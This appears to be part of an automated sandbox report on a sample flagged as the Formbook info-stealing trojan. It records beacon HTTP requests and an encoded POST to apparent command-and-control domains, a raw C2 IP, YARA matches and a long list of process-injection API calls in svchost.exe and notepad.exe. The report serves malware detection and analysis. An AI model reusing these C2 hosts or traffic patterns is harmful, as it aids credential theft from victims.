User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)

Source: global traffic; HTTP traffic detected:
GET /ezjb/?gHCXmDU=l3Sp86LdHQK51JyE1bYSLRwrZz79eLj2OPa9S2eacvhOVgE1mplOojXymOZ9YDGfggwACbk9WjYrzuHmvoZIXyGwVLnNH3EmPti700Sf3mBkVqNnJJuO7TSqISvYzPtlzQ==&Gh9=g8u8 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.bqberw.vip
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)

Source: global traffic; HTTP traffic detected:
GET /0fox/?Gh9=g8u8&gHCXmDU=4CzKvyikl1JmGr8+CQf9WWAdO1Gj6lWNmDPUBHudsRDXm35ePvWJknN1Cj9rj3LGeee2ucHQDjkFWVqRWStwJougsDrkF+FnKnugc/NP5deCT95MsghdxHCGfuWAxmiXjA== HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.weatherbook.live
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)

Source: global traffic; HTTP traffic detected:
GET /9apq/?gHCXmDU=LHjDDAx19xzpDFr0PiWSUWbLpibiWm2OcttpvXYQA3jhT8+aBAnUV8C6f3e3WqOmZ67HZ5Oe4rCfD6agN7j3kbNhxDE+C6RgPFZIWir2F/mXh+rIzbzvAjzVwKDU5y7xZw==&Gh9=g8u8 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.cc101.pro
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)

Source: global traffic; HTTP traffic detected:
GET /66j2/?Gh9=g8u8&gHCXmDU=HppDh2G+RtpfmDCT0lrSNXbmIaO8PdTsBI8zXGv7BhGUw+IQzheJ3lftE5yUT4NGt8aZPQR/20xdb9u1HnRpXJ4mqLkzjkiMvvw05xDKhjbhyfyxEkkTngu+5afP1ml7ew== HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.dverkom.store
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)

Source: global traffic; HTTP traffic detected:
GET /8y34/?gHCXmDU=XU1sh1XtMideJdcsvQ849SwdzHfbiD52gXGwR5WASyJ1tlInyqc9ITTs981nRcft/RKcq7FVheMXMN6zJo5iI2BJEO7R6UftY8jdwwsPJfysQECRq1QA/MaERKdZHzC5fw==&Gh9=g8u8 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.crowsecurity.cloud
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)

Source: global traffic; HTTP traffic detected:
GET /kdfx/?gHCXmDU=eNDgnj/WfiIi0tdu+8aXiZOUK+7f3FxcWZT5SlTqKAn5yXi4RD1689oWOvV8Od+Oy+8ctbdx7DJ/alyTHONZQzsxT9MNlSdJwngJpwfGelD5vY9uXcKC+Fx9+CLw3WjCzw==&Gh9=g8u8 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.multileveltravel.world
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)

Source: global traffic; HTTP traffic detected:
GET /ghvt/?gHCXmDU=LTjEQRzJtYpWLPC7D2gy6fienZfrxvC35gdjmmThy52R4q9H0AiUwAwLJzzKst3lsJoWNw2bCWGayp08MXQ4hrVkAG0NSKhN96qT0ct2vaZlIyhDhNk8pUo7hoK/rit8rQ==&Gh9=g8u8 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.technectar.top
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)

Source: global traffic; HTTP traffic detected:
GET /l8vr/?gHCXmDU=GUwa608LSzm8fYtcdeTRGyNyj51nBuUp00umbYRCm/TJjJxpSTDMONkqNmsHjnZjkXKqFncjqJIueqMvFavlXIaPeRkD7t3kPxbZ1SpX5GCbw23hlnYlJ0j4JxqETFq6pw==&Gh9=g8u8 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.linkwave.cloud
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
            Source: global trafficHTTP traffic detected: GET /5hcm/?gHCXmDU=tP3kAkfnE7i1YCC3akJDPtDOQtMjgFa5K3aSOloco8KmCG1xGxL66P/sVWpGfWTMdHJkfi3yOYhNMZMhorUklSdDj9q9dz65TNSy5hy/ttZPgJetaDNmb5haRLwL+/pH9A==&Gh9=g8u8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.bayarcepat19.clickConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
            Source: global traffic | DNS traffic detected: DNS query: www.dxeg.lol
            Source: global traffic | DNS traffic detected: DNS query: www.bqberw.vip
            Source: global traffic | DNS traffic detected: DNS query: www.weatherbook.live
            Source: global traffic | DNS traffic detected: DNS query: www.cc101.pro
            Source: global traffic | DNS traffic detected: DNS query: www.dverkom.store
            Source: global traffic | DNS traffic detected: DNS query: www.crowsecurity.cloud
            Source: global traffic | DNS traffic detected: DNS query: www.multileveltravel.world
            Source: global traffic | DNS traffic detected: DNS query: www.technectar.top
            Source: global traffic | DNS traffic detected: DNS query: www.linkwave.cloud
            Source: global traffic | DNS traffic detected: DNS query: www.bayarcepat19.click
            Source: global traffic | DNS traffic detected: DNS query: www.queima.shop
            Source: unknown | HTTP traffic detected: POST /ezjb/ HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Accept-Encoding: gzip, deflate | Host: www.bqberw.vip | Origin: http://www.bqberw.vip | Referer: http://www.bqberw.vip/ezjb/ | Content-Length: 208 | Cache-Control: max-age=0 | Content-Type: application/x-www-form-urlencoded | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH) | Data Raw: [hex dump omitted] | Data Ascii: gHCXmDU=o16J/OHSeQOFwb3IwrUzFVsaZU77WoSbAITlEWaAe81yeygfkO52u0zluad3Zw60nW1DCYsgbQovyvLarrpRV0SGbqH3DVk9NdaY/lG2xVswSKEcBuHe4SHQF0fP2uYxo1Fc5l2EirdVNUdFMUBVme3UiDGFd0w06wc+aTU3D7q/bKHAF8amwmaCwGmJC/kT7/PfNxs=
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 30 Sep 2024 16:45:30 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Content-Encoding: gzip | Data Raw: [chunked gzip-compressed body, hex dump omitted]
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 30 Sep 2024 16:45:33 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Content-Encoding: gzip | Data Raw: [chunked gzip-compressed body, hex dump omitted]
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 30 Sep 2024 16:45:36 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Content-Encoding: gzip | Data Raw: [chunked gzip-compressed body, hex dump omitted]
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 30 Sep 2024 16:45:38 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Data Raw: [hex dump omitted] | Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 30 Sep 2024 16:46:12 GMT | Server: Apache | X-Frame-Options: SAMEORIGIN | Content-Length: 774 | X-XSS-Protection: 1; mode=block | Connection: close | Content-Type: text/html | Data Raw: [hex dump omitted] | Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 30 Sep 2024 16:46:15 GMT | Server: Apache | X-Frame-Options: SAMEORIGIN | Content-Length: 774 | X-XSS-Protection: 1; mode=block | Connection: close | Content-Type: text/html | Data Raw: [hex dump omitted] | Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 30 Sep 2024 16:46:17 GMT | Server: Apache | X-Frame-Options: SAMEORIGIN | Content-Length: 774 | X-XSS-Protection: 1; mode=block | Connection: close | Content-Type: text/html | Data Raw: [hex dump omitted] | Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 30 Sep 2024 16:46:20 GMT | Server: Apache | X-Frame-Options: SAMEORIGIN | Content-Length: 774 | X-XSS-Protection: 1; mode=block | Connection: close | Content-Type: text/html; charset=utf-8 | Data Raw: [hex dump omitted] | Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound">
            Source: notepad.exe, 00000005.00000002.3885110150.0000000005B6A000.00000004.10000000.00040000.00000000.sdmp, notepad.exe, 00000005.00000002.3886877799.0000000007A00000.00000004.00000800.00020000.00000000.sdmp, HAdkDWMZRiGMZe.exe, 00000006.00000002.3884241981.000000000395A000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://156.226.108.98:58888/
            Source: HAdkDWMZRiGMZe.exe, 00000006.00000002.3886044229.0000000005581000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.bayarcepat19.click
            Source: HAdkDWMZRiGMZe.exe, 00000006.00000002.3886044229.0000000005581000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.bayarcepat19.click/5hcm/
            Source: notepad.exe, 00000005.00000002.3887050160.0000000007D2E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: notepad.exe, 00000005.00000002.3887050160.0000000007D2E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: notepad.exe, 00000005.00000002.3887050160.0000000007D2E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: notepad.exe, 00000005.00000002.3887050160.0000000007D2E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: notepad.exe, 00000005.00000002.3887050160.0000000007D2E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: notepad.exe, 00000005.00000002.3887050160.0000000007D2E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: notepad.exe, 00000005.00000002.3887050160.0000000007D2E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: notepad.exe, 00000005.00000002.3885110150.00000000061B2000.00000004.10000000.00040000.00000000.sdmp, HAdkDWMZRiGMZe.exe, 00000006.00000002.3884241981.0000000003FA2000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
            Source: notepad.exe, 00000005.00000002.3882543699.0000000002E91000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: notepad.exe, 00000005.00000002.3882543699.0000000002E91000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: notepad.exe, 00000005.00000002.3882543699.0000000002E91000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: notepad.exe, 00000005.00000002.3882543699.0000000002E91000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: notepad.exe, 00000005.00000002.3882543699.0000000002E91000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: notepad.exe, 00000005.00000002.3882543699.0000000002E91000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: notepad.exe, 00000005.00000003.2526507791.0000000007D05000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: notepad.exe, 00000005.00000002.3885110150.00000000064D6000.00000004.10000000.00040000.00000000.sdmp, HAdkDWMZRiGMZe.exe, 00000006.00000002.3884241981.00000000042C6000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.bayarcepat19.click/5hcm/?gHCXmDU=tP3kAkfnE7i1YCC3akJDPtDOQtMjgFa5K3aSOloco8KmCG1xGxL66P/
            Source: notepad.exe, 00000005.00000002.3887050160.0000000007D2E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/

            E-Banking Fraud

            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000005.00000002.3882344624.0000000002B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.3883839683.0000000005350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3886044229.00000000054F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2343906085.0000000006650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.3883738653.0000000004A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2343594491.0000000003790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.3883798608.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3882344624.0000000002B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3883839683.0000000005350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3886044229.00000000054F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2343906085.0000000006650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3883738653.0000000004A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2343594491.0000000003790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3883798608.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042C753 NtClose, 2_2_0042C753
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A735C0 NtCreateMutant, LdrInitializeThunk, 2_2_03A735C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72B60 NtClose, LdrInitializeThunk, 2_2_03A72B60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72DF0 NtQuerySystemInformation, LdrInitializeThunk, 2_2_03A72DF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A74340 NtSetContextThread, 2_2_03A74340
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A73090 NtSetValueKey, 2_2_03A73090
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A73010 NtOpenDirectoryObject, 2_2_03A73010
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A74650 NtSuspendThread, 2_2_03A74650
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72BA0 NtEnumerateValueKey, 2_2_03A72BA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72B80 NtQueryInformationFile, 2_2_03A72B80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72BE0 NtQueryValueKey, 2_2_03A72BE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72BF0 NtAllocateVirtualMemory, 2_2_03A72BF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72AB0 NtWaitForSingleObject, 2_2_03A72AB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72AF0 NtWriteFile, 2_2_03A72AF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72AD0 NtReadFile, 2_2_03A72AD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A739B0 NtGetContextThread, 2_2_03A739B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72FA0 NtQuerySection, 2_2_03A72FA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72FB0 NtResumeThread, 2_2_03A72FB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72F90 NtProtectVirtualMemory, 2_2_03A72F90
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72FE0 NtCreateFile, 2_2_03A72FE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72F30 NtCreateSection, 2_2_03A72F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72F60 NtCreateProcessEx, 2_2_03A72F60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72EA0 NtAdjustPrivilegesToken, 2_2_03A72EA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72E80 NtReadVirtualMemory, 2_2_03A72E80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72EE0 NtQueueApcThread, 2_2_03A72EE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72E30 NtWriteVirtualMemory, 2_2_03A72E30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72DB0 NtEnumerateKey, 2_2_03A72DB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72DD0 NtDelayExecution, 2_2_03A72DD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72D30 NtUnmapViewOfSection, 2_2_03A72D30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72D00 NtSetInformationFile, 2_2_03A72D00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72D10 NtMapViewOfSection, 2_2_03A72D10
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A73D10 NtOpenProcessToken, 2_2_03A73D10
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A73D70 NtOpenThread, 2_2_03A73D70
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72CA0 NtQueryInformationToken, 2_2_03A72CA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72CF0 NtOpenProcess, 2_2_03A72CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72CC0 NtQueryVirtualMemory,2_2_03A72CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72C00 NtQueryInformationProcess,2_2_03A72C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72C60 NtCreateKey,2_2_03A72C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72C70 NtFreeVirtualMemory,2_2_03A72C70
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D135C0 NtCreateMutant,LdrInitializeThunk,5_2_04D135C0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D14650 NtSuspendThread,LdrInitializeThunk,5_2_04D14650
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D14340 NtSetContextThread,LdrInitializeThunk,5_2_04D14340
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_04D12CA0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_04D12C70
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12C60 NtCreateKey,LdrInitializeThunk,5_2_04D12C60
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12DD0 NtDelayExecution,LdrInitializeThunk,5_2_04D12DD0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_04D12DF0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12D10 NtMapViewOfSection,LdrInitializeThunk,5_2_04D12D10
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_04D12D30
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12EE0 NtQueueApcThread,LdrInitializeThunk,5_2_04D12EE0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_04D12E80
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12FE0 NtCreateFile,LdrInitializeThunk,5_2_04D12FE0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12FB0 NtResumeThread,LdrInitializeThunk,5_2_04D12FB0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12F30 NtCreateSection,LdrInitializeThunk,5_2_04D12F30
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D139B0 NtGetContextThread,LdrInitializeThunk,5_2_04D139B0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12AD0 NtReadFile,LdrInitializeThunk,5_2_04D12AD0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12AF0 NtWriteFile,LdrInitializeThunk,5_2_04D12AF0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_04D12BF0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12BE0 NtQueryValueKey,LdrInitializeThunk,5_2_04D12BE0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_04D12BA0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12B60 NtClose,LdrInitializeThunk,5_2_04D12B60
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D13090 NtSetValueKey,5_2_04D13090
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D13010 NtOpenDirectoryObject,5_2_04D13010
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12CC0 NtQueryVirtualMemory,5_2_04D12CC0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12CF0 NtOpenProcess,5_2_04D12CF0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12C00 NtQueryInformationProcess,5_2_04D12C00
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12DB0 NtEnumerateKey,5_2_04D12DB0
